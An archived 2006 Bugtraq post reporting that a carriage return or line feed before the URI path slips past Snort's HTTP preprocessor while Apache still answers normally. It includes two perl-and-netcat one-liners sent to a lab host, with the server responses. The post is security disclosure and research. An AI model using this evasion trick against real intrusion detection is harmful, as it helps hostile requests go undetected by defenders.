lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060603104124.1b1507a04a440dbbe6ab6eabc5c58a9e.fbc12fe6cd.wbe@email.secureserver.net>
Date: Sat, 03 Jun 2006 10:41:24 -0700
From: Sigint Consulting <info@...int-consulting.com>
To: bugtraq@...urityfocus.com, dailydave@...ts.immunitysec.com
Cc: security@...rt.org, dodge@....net, jebrahimi@...arc.net
Subject: Re: New Snort Bypass - Patch - Bypass of Patch


>I performed this research while developing NFR's web signatures, and found
>that all web servers I tested (several years ago) handled end-of-lines using
>"\x0d\x0a" and "\x0a" interchangeably. If you find a web server that
>interprets "index.php" in the example above as an actual filename, I for one
>would be very interested in knowing about it.
>
>Dodge
>

Apache 1.3.34 (debian package) returns index.html from my request as
normal even though the file name has a \x0d before it. So in Apache's
case it appears that the \x0d character will not mess up the request to
the webserver, atleast in this case AND still bypasses the snort check.
Now obviously the \x90\x90 are going to ruin the request because no
such file exists by that name so they were left out of this example,
but this may mean the \x0d character would not mangle a real malicious
request to apache.

$ perl -e 'print "GET \x0d/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
HTTP/1.1 200 OK
Date: Mon, 05 Jun 2006 07:25:47 GMT
Server: Apache/1.3.34 (Debian)
Last-Modified: Sat, 03 Jun 2006 09:24:26 GMT
ETag: "6f9d3-4d-4481554a"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: text/html; charset=iso-8859-1

<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding .
. . 
$

Further research on the snort vulnerability reveals that the \x0a
character will also evade the snort preprocessor AND apache will return
a valid response. (Testing \x0a before a malicious unicode string did
not generate a snort alert)

$ perl -e 'print "GET \x0a/index.html HTTP/1.0\n\r\n"'|nc 192.168.1.3 80
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=html/index.html">Forwarding .
. .
$

Chris

--------------------------------
www.sigint-consulting.com
info@...int-consulting.com

Charlotte, North Carolina 
Information Security Consulting
--------------------------------



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ